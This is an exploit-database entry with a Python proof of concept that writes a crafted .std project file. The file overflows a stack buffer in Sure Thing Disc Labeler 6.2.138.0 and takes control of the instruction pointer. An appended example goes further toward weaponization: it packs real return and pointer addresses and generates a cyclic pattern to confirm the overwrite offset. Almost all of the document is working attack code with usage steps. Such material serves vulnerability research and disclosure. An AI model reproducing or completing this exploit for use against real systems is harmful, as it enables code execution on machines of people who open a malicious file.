Sure Thing Disc Labeler 6.2.138.0 – Buffer Overflow (PoC)

  • Author: Chance Johnson
    Date: 2017-05-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/42040/
  • # Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC)
    # Date: 5-19-17
    # Exploit Author: Chance Johnson(albatross@loftwing.net)
    # Vendor Homepage: http://www.surething.com/
    # Software Link: http://www.surething.com/disclabeler
    # Version: 6.2.138.0
    # Tested on: Windows 7 x64 / Windows 10
    #
    # Usage:
    # Open the project template (exp.std) generated by this script in Sure Thing Disc Labeler.
    # If AVread holds a readable address, no access-violation exception is thrown
    # before the vulnerable function returns; by then the saved return address has
    # been overwritten with the EIP bytes (file offset 11048), so EIP is controlled
    # when the function returns.
    
    # Python 3 (the original PoC was written for Python 2); all payload pieces are bytes.
    header  = b'\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00'
    header += b'\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62'
    header += b'\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35'
    header += b'\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41'
    header += b'\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63'
    
    junk1  = b'D' * 10968       # padding up to the saved return address
    EIP    = b'A' * 4           # direct RET overwrite (file offset 80 + 10968 = 11048)
    junk2  = b'D' * 24
    AVread = b'B' * 4           # address of any readable memory (file offset 11076)
    junk3  = b'D' * 105693
    
    buf = header + junk1 + EIP + junk2 + AVread + junk3
    
    print("[+] Creating file with %d bytes..." % len(buf))   # 116773 bytes
    
    with open("exp.std", 'wb') as f:
        f.write(buf)
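The block below is an added example, not part of Chance Johnson's PoC. It reuses the PoC's header and padding lengths and shows the two things a practitioner does next: pack a real return address and a real readable address little-endian in place of the `AAAA`/`BBBB` placeholders, and confirm the return-address offset (11048) with a cyclic De Bruijn pattern rather than trusting the hard-coded lengths. The function names, the `pattern.std` file name and the 32-bit packing (the target is an x86 process) are this example's own assumptions; no target addresses are assumed.

```python
import struct

# Header copied from the PoC above: 80 bytes beginning with the "MV" magic.
HEADER = (
    b'\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00'
    b'\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62'
    b'\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35'
    b'\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41'
    b'\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63'
)

# Padding lengths taken from the PoC.
JUNK1 = 10968    # bytes between the header and the saved return address
JUNK2 = 24       # bytes between the return address and the dereferenced pointer
JUNK3 = 105693   # trailing bytes so the file reaches the length the PoC uses

EIP_OFFSET = len(HEADER) + JUNK1           # 11048
AVREAD_OFFSET = EIP_OFFSET + 4 + JUNK2     # 11076
TOTAL_LEN = AVREAD_OFFSET + 4 + JUNK3      # 116773


def build(ret_addr, readable_addr, filler=b'D'):
    """Build the .std contents with both 32-bit values packed little-endian.

    build(0x41414141, 0x42424242) reproduces the PoC's exp.std byte for byte.
    """
    if not (0 <= ret_addr <= 0xFFFFFFFF and 0 <= readable_addr <= 0xFFFFFFFF):
        raise ValueError("addresses must fit in 32 bits (assumed x86 target)")
    return (HEADER
            + filler * JUNK1
            + struct.pack('<I', ret_addr)
            + filler * JUNK2
            + struct.pack('<I', readable_addr)
            + filler * JUNK3)


def de_bruijn(alphabet, n):
    """De Bruijn sequence B(k, n): each n-byte window over `alphabet` occurs at most once."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


def build_pattern_file():
    """Same header and length as the PoC, but the payload is a cyclic pattern."""
    pattern = de_bruijn(b'abcdefghijklmnopqrstuvwxyz', 4)   # 26**4 = 456976 bytes, enough
    return HEADER + pattern[:TOTAL_LEN - len(HEADER)]


def offset_of(data, eip_value):
    """File offset whose 4 bytes, read little-endian, equal the crashed EIP; -1 if absent."""
    needle = struct.pack('<I', eip_value)
    return data.find(needle, len(HEADER))   # skip the header so its ASCII cannot match


if __name__ == '__main__':
    data = build_pattern_file()
    with open('pattern.std', 'wb') as f:        # open this one in the labeler under a debugger
        f.write(data)
    # Feed the EIP value shown by the debugger to offset_of(); here we simulate that
    # by reading the bytes we know will land in the saved return address.
    eip = int.from_bytes(data[EIP_OFFSET:EIP_OFFSET + 4], 'little')
    print("EIP 0x%08x -> file offset %d (expected %d)" % (eip, offset_of(data, eip), EIP_OFFSET))
```

Crash the labeler with `pattern.std`, read EIP from the debugger, and `offset_of()` maps it back to the file offset; if it does not come out at 11048 the padding lengths above need adjusting for that build. Once the offset is confirmed, `build()` takes the real return address and a known-readable address for the pointer that is dereferenced before the return.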